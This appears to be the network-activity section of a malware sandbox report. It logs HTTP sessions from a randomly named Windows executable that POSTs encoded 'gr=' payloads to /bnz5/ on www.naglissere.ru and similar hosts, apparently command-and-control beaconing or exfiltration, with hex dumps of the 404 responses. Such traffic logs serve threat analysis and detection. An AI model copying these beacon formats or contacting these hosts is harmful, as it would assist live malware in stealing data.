                                                                                                      Apr 16, 2024 12:02:48.479162931 CEST458OUTGET /bnz5/?gr=6OoDw3xNyuUxCb7SO8/wQWyB7gJcoYv4ZTaI1h51IYF+sVRVSOMOuR9r6Rx19mFv7TRZYpTQN5hhg3dhUB7GRpmcej2viG1w8/6TMbbBsdyRJnmf1CwT9GI+x7zG1LG56Q==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:02:48.632186890 CEST1087INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:48 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      49192.168.2.549768185.215.4.13802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:54.276185989 CEST706OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 5a 4f 6c 43 58 72 43 34 43 6f 2f 4f 71 66 44 6b 45 57 70 4c 58 66 4c 39 55 46 34 65 32 73 75 50 43 4c 75 4d 35 4a 51 47 68 74 56 6d 41 37 32 48 79 75 55 37 58 73 75 56 6e 35 39 50 61 55 79 31 51 75 36 33 50 62 73 61 37 6d 75 4c 52 46 46 5a 32 53 4e 72 6c 6c 2f 34 74 6f 53 35 31 64 6c 66 6f 41 4f 46 74 78 68 35 79 71 57 2b 51 6c 49 7a 7a 67 45 59 6b 75 6a 52 6b 54 63 30 76 2f 75 6f 65 61 41 52 45 7a 67 48 32 6f 6a 45 77 74 6c 2b 6d 32 66 48 38 6c 6c 79 49 66 2b 5a 63 49 66 4f 31 76 6a 62 73 73 75 69 58 55 74 42 5a 69 58 2b 47 46 35 67 41 78 62 56 52 7a 72 64 6e 70 38 49 50 63 2b 59 39 6b 73 3d
                                                                                                      Data Ascii: gr=ZOlCXrC4Co/OqfDkEWpLXfL9UF4e2suPCLuM5JQGhtVmA72HyuU7XsuVn59PaUy1Qu63Pbsa7muLRFFZ2SNrll/4toS51dlfoAOFtxh5yqW+QlIzzgEYkujRkTc0v/uoeaAREzgH2ojEwtl+m2fH8llyIf+ZcIfO1vjbssuiXUtBZiX+GF5gAxbVRzrdnp8IPc+Y9ks=
                                                                                                      Apr 16, 2024 12:02:54.524749041 CEST749INHTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=7nERBm9qcGQS1BK4u13e; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:54 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:54 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      50192.168.2.549769185.215.4.13802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:56.919907093 CEST726OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 5a 4f 6c 43 58 72 43 34 43 6f 2f 4f 70 38 4c 6b 48 33 70 4c 62 76 4c 2b 62 6c 34 65 2f 4d 75 4c 43 4c 69 4d 35 49 6b 57 68 66 42 6d 41 5a 65 48 7a 73 38 37 55 73 75 56 7a 70 39 57 65 55 79 38 51 75 32 2f 50 61 38 61 37 6d 4b 4c 52 48 4e 5a 78 6c 52 30 33 46 2f 36 34 59 53 2f 72 74 6c 66 6f 41 4f 46 74 78 64 54 79 71 65 2b 51 56 34 7a 68 52 45 48 6f 4f 6a 53 30 6a 63 30 6b 66 75 6b 65 61 41 33 45 33 68 69 32 75 6e 45 77 73 56 2b 6c 69 72 41 70 56 6b 35 48 2f 2b 4d 4e 61 53 52 2b 63 2f 73 6f 4b 6a 44 58 46 51 2b 63 55 36 55 63 6e 78 49 54 52 33 74 42 67 6a 71 32 5a 64 68 56 2f 75 6f 6a 7a 34 71 67 51 6f 67 7a 7a 66 39 55 75 7a 6a 6f 7a 74 6d 54 69 7a 51
                                                                                                      Data Ascii: gr=ZOlCXrC4Co/Op8LkH3pLbvL+bl4e/MuLCLiM5IkWhfBmAZeHzs87UsuVzp9WeUy8Qu2/Pa8a7mKLRHNZxlR03F/64YS/rtlfoAOFtxdTyqe+QV4zhREHoOjS0jc0kfukeaA3E3hi2unEwsV+lirApVk5H/+MNaSR+c/soKjDXFQ+cU6UcnxITR3tBgjq2ZdhV/uojz4qgQogzzf9UuzjoztmTizQ
                                                                                                      Apr 16, 2024 12:02:57.183358908 CEST749INHTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=kegewplNQENTSIE1Q7qY; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:56 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:55 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      51192.168.2.549770185.215.4.1380
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:59.856980085 CEST1743OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 5a 4f 6c 43 58 72 43 34 43 6f 2f 4f 70 38 4c 6b 48 33 70 4c 62 76 4c 2b 62 6c 34 65 2f 4d 75 4c 43 4c 69 4d 35 49 6b 57 68 65 35 6d 42 6f 2b 48 79 4e 38 37 56 73 75 56 77 70 39 4c 65 55 7a 75 51 74 47 37 50 61 77 4b 37 6b 43 4c 51 69 5a 5a 30 58 35 30 75 31 2f 36 36 59 53 2b 31 64 6b 46 6f 41 65 42 74 77 68 54 79 71 65 2b 51 58 51 7a 32 51 45 48 71 4f 6a 52 6b 54 63 77 76 2f 76 37 65 61 59 4a 45 33 73 58 32 65 48 45 7a 4d 46 2b 32 6e 66 41 72 31 6b 37 45 2f 2f 4a 4e 61 65 30 2b 63 6a 61 6f 4b 2f 6c 58 43 38 2b 65 52 6e 65 48 55 52 30 48 41 58 57 53 78 7a 57 30 4d 39 37 64 2b 61 38 67 6b 41 46 69 42 55 43 32 31 76 44 56 39 65 52 31 46 39 67 54 6d 75 44 67 4a 55 51 32 63 44 6b 37 36 7a 64 4e 69 67 52 74 55 61 35 42 43 5a 4d 53 7a 45 6d 73 46 4d 6a 73 54 71 41 57 6f 62 71 2f 30 78 2f 56 33 70 39 49 35 41 74 51 30 67 33 6c 2f 6d 45 63 33 46 31 77 49 31 64 53 61 2b 56 79 70 53 35 63 2b 59 6a 4c 55 66 4f 30 66 51 69 38 44 58 2b 64 30 2b 38 63 4e 4d 67 6a 2b 4c 77 78 50 5a 34 6d 2b 49 35 52 41 74 4e 34 62 54 2f 77 48 62 39 5a 6c 67 35 47 4d 33 75 69 49 2b 31 52 41 2b 6d 68 67 78 65 79 6b 58 61 37 75 4f 6d 4b 70 69 58 45 4f 48 35 4c 44 48 74 65 50 38 65 49 54 70 7a 2b 73 44 6f 7a 70 52 4f 55 4e 58 4d 6f 75 4d 2f 33 69 34 4a 45 45 44 4b 4f 34 4b 32 78 41 63 42 50 69 63 4c 77 57 6b 48 68 39 4e 4a 34 52 33 43 45 30 55 77 30 72 2f 51 76 2f 4b 43 45 7a 63 4d 42 47 31 47 64 4b 79 74 52 41 34 69 42 4f 47 4b 58 69 73 49 70 73 2f 5a 7a 36 69 2b 50 43 56 4e 51 32 70 42 33 46 56 47 5a 73 31 74 50 6e 6b 35 44 51 59 7a 5a 78 33 44 32 6f 52 34 55 58 4c 37 51 6f 54 31 6c 39 55 77 63 75 69 69 41 4f 6c 38 49 48 45 69 77 77 56 54 6f 46 50 6d 7a 41 6c 73 2b 63 57 75 5a 4a 54 4e 4e 34 65 4a 50 46 49 30 33 52 66 64 50 6e 33 66 35 62 44 4c 75 55 67 46 45 62 43 71 59 5a 78 53 44 70 69 6d 57 48 7a 69 64 4e 47 41 2f 6d 78 52 43 4f 58 63 57 62 45 75 69 78 66 34 52 36 66 41 33 35 2b 66 69 36 66 6a 54 2b 4a 59 4c 64 52 46 68 77 78 49 49 36 6e 35 4e 31 4e 49 47 45 75 52 39 6d 32 48 6c 44 50 51 53 51 44 32 56 78 79 36 4a 32 41 58 57 46 65 77 54 67 56 65 52 48 6e 4b 57 78 32 62 6b 4d 38 61 5a 71 73 6a 62 69 34 76 36 70 4b 55 4f 63 70 4d 33 4b 39 59 69 41 58 4f 67 67 47 63 48 2f 41 7a 6a 69 74 4d 4b 35 42 4d 77 5a 36 63 39 50 37 4a 4c 6a 38 64 4c 69 67 6f 77 53 34 4f 32 75 79 5a 72 62 75 41 49 4d 44 72 74 36 30 74 41 4e 41 59 42 58 67 79 2b 4b 31 6e 57 69 44 56 76 73 63 33 35 4e 4f 6e 2f 61 43 68 4b 4d 41 30 71 47 65 78 39 33 56 51 67 67 74 61 73 69 65 58 34 50 4f 6f 71 61 39 54 77 48 77 76 64 34 6e 65 63 36 4a 6d 45 6d 44 73 4a 4e 6b 5a 6d 49 56 57 51 66 54 4e 57 4f 69 4d 56 78 59 55 4e 43 6d 4a 58 72 61 46 78 71 5a 30 71 2f 4f 62 47 6e 69 51 6c 52 2b 57 79 78 53 5a 47 59 48 52 35 4a 31 75 64 57 68 44 32 71 67 36 6c 6c 42 4b 6b 54 6b 2f 63 2f 6a 69 70 58 38 6d 67 4d 4b 52 48 4c 58 6e 52 46 5a 63 79 37 7a 5a 31 4d 35 47 5a 4d 46 5a 79 62 4b 35 34 61 56 57 4c 5a 63 4e 71 4a 73 2f 58 64 30 6f 4c 79 74 68 7a 34 47 6b 63 76 42 79 37 52 6b 52 55 4c 6b 31 68 68 6f 59 37 43 37 43 5a 54 39 4a 2f 72 30 5a 32 7a 74 41 59 68 52 58 64 50 70 4a 79 48 69 6c 37 58 37 75 2b 2b 62 68 44 38 31 32 75 47 64 32 56 36 4f 75 37 30 52 4b 44 2f 45 62 77 54 2f 4b 5a 44 4a 45 44 50 36 69 36 76 57 31 47 54 6f 76 75 49 54 69 50 4b 41 51 70 4f 34 73 73 64 79 49 47 6c 4f 7a 57 54 2f 50 31 58 4e 54 63 6b 6b 59 6e 48 53 36 62 53 4d 54 74 7a 32 67 47 56 77 30 6c 74 46 63 53 4b 62 47 45 4f 69 75 65 5a 4f 74 68 38 6c 72 64 37 71 31 67 73 71 33 35 36 70 43 45 2b 57 42 32 65 35 71 4f 49 6c 46 2b 36 2f 4d 53 69 77 78 78 41 69 4f 74 65 4d 68 39 65 74 4b 46 31 4d 6c 59 4a 66 2f 41 70 77 51 76 67 4e 34 35 73 41 5a 6d 49 48 62 52 64 6f 53 78 79 36 79 55 38 4f 48 33 4e 2b 73 6f 51 78 61 55 77 70 77 4a 31 52 55 37 41 3d 3d
                                                                                                      Data Ascii: gr=ZOlCXrC4Co/Op8LkH3pLbvL+bl4e/MuLCLiM5IkWhe5mBo+HyN87VsuVwp9LeUzuQtG7PawK7kCLQiZZ0X50u1/66YS+1dkFoAeBtwhTyqe+QXQz2QEHqOjRkTcwv/v7eaYJE3sX2eHEzMF+2nfAr1k7E//JNae0+cjaoK/lXC8+eRneHUR0HAXWSxzW0M97d+a8gkAFiBUC21vDV9eR1F9gTmuDgJUQ2cDk76zdNigRtUa5BCZMSzEmsFMjsTqAWobq/0x/V3p9I5AtQ0g3l/mEc3F1wI1dSa+VypS5c+YjLUfO0fQi8DX+d0+8cNMgj+LwxPZ4m+I5RAtN4bT/wHb9Zlg5GM3uiI+1RA+mhgxeykXa7uOmKpiXEOH5LDHteP8eITpz+sDozpROUNXMouM/3i4JEEDKO4K2xAcBPicLwWkHh9NJ4R3CE0Uw0r/Qv/KCEzcMBG1GdKytRA4iBOGKXisIps/Zz6i+PCVNQ2pB3FVGZs1tPnk5DQYzZx3D2oR4UXL7QoT1l9UwcuiiAOl8IHEiwwVToFPmzAls+cWuZJTNN4eJPFI03RfdPn3f5bDLuUgFEbCqYZxSDpimWHzidNGA/mxRCOXcWbEuixf4R6fA35+fi6fjT+JYLdRFhwxII6n5N1NIGEuR9m2HlDPQSQD2Vxy6J2AXWFewTgVeRHnKWx2bkM8aZqsjbi4v6pKUOcpM3K9YiAXOggGcH/AzjitMK5BMwZ6c9P7JLj8dLigowS4O2uyZrbuAIMDrt60tANAYBXgy+K1nWiDVvsc35NOn/aChKMA0qGex93VQggtasieX4POoqa9TwHwvd4nec6JmEmDsJNkZmIVWQfTNWOiMVxYUNCmJXraFxqZ0q/ObGniQlR+WyxSZGYHR5J1udWhD2qg6llBKkTk/c/jipX8mgMKRHLXnRFZcy7zZ1M5GZMFZybK54aVWLZcNqJs/Xd0oLythz4GkcvBy7RkRULk1hhoY7C7CZT9J/r0Z2ztAYhRXdPpJyHil7X7u++bhD812uGd2V6Ou70RKD/EbwT/KZDJEDP6i6vW1GTovuITiPKAQpO4ssdyIGlOzWT/P1XNTckkYnHS6bSMTtz2gGVw0ltFcSKbGEOiueZOth8lrd7q1gsq356pCE+WB2e5qOIlF+6/MSiwxxAiOteMh9etKF1MlYJf/ApwQvgN45sAZmIHbRdoSxy6yU8OH3N+soQxaUwpwJ1RU7A==
                                                                                                      Apr 16, 2024 12:03:00.126024961 CEST749INHTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=0uihN83ZkchmiEoJtwrf; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:59 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:58 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      52192.168.2.549771185.215.4.1380
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:02.499505997 CEST449OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=UMNiUc6XIv/d2uC7IlFmdfXYbiB/0cGyF5nVzLNzjfRVEsK0zJlkeP+z5Z1MT37PYueGSacB+keqYnFu3S8ymlT8yqaJ/dNBtni0ghgK1oHFbUR/jwcWs7rz0kpYku2gKQ== HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:02.758929014 CEST727INHTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=FsLO3Xo3enk5xsnyCzPb; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:03:02 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:03:01 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      X-Frame-Options: SAMEORIGIN
